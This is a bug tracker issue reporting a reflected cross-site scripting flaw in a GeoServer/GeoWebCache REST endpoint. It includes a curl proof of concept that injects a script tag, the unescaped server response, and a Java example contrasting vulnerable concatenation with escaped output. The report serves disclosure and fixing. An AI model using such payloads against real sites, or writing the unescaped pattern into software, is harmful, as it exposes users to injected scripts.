Details

    • Type: Bug
    • Status: Resolved
    • Priority: Medium
    • Resolution: Fixed
    • Affects Version/s: 2.8.5
    • Fix Version/s: 2.12-RC1
    • Component/s: Vulnerability
    • Environment:

      Tomcat 7, OpenJDK 1.8.0_102

      Description

      Running

      curl 'http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>'

      yields an answer with unescaped HTML:

      <html><body>
      <a id="logo" href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</"><img src="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/web/geowebcache_logo.png" alt="" height="100" width="353" border="0"/></a>
      <h3>Resources available from here:</h3><ul><li><h4><a href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/layers/">layers</a></h4>Lets you see the configured layers. You can also view a specific layer  by appending the name of the layer to the URL, DELETE an existing layer  or POST a new one. Note that the latter operations only make sense when GeoWebCache has been configured through geowebcache.xml. You can POST either XML or JSON.</li>
      <li><h4>seed</h4></li>
      </ul></body></html>
      

      Looks like the problem is similar to GEOS-7549.
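The pattern behind the response above, as an added example that is not part of the original report and not GeoServer or GeoWebCache code: a request URL concatenated into markup, next to the same markup built with the URL HTML-escaped first. The class and method names (`RestIndexEscaping`, `escapeHtml`, `indexUnescaped`, `indexEscaped`) are hypothetical, and the input is the URL from the curl command in the report.

```java
public class RestIndexEscaping {

    // Minimal HTML escaper covering element text and quoted attribute values.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Same shape as the reported response: the request URL goes into the
    // href attribute as-is, so a '"' in the path closes the attribute and
    // the rest of the path is parsed as markup.
    static String indexUnescaped(String baseUrl) {
        return "<li><h4><a href=\"" + baseUrl + "/layers/\">layers</a></h4></li>";
    }

    // Hardened form: the URL is escaped at the point where it enters HTML,
    // so it can only ever be attribute data.
    static String indexEscaped(String baseUrl) {
        return "<li><h4><a href=\"" + escapeHtml(baseUrl) + "/layers/\">layers</a></h4></li>";
    }

    public static void main(String[] args) {
        // Constructed input: the request URL from the report's curl command.
        String url = "http://localhost:8080/geoserver/gwc/rest/web/\"><script>alert(1)</script>";

        System.out.println("unescaped: " + indexUnescaped(url));
        System.out.println("escaped:   " + indexEscaped(url));

        // Check a regression test for this bug could make: no raw tag
        // from the request path survives in the escaped output.
        if (indexEscaped(url).contains("<script>")) {
            throw new IllegalStateException("request URL reached the page unescaped");
        }
    }
}
```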

            People

            • Assignee:
              Unassigned
            • Reporter:
              hrubsa Juraj Hrubsa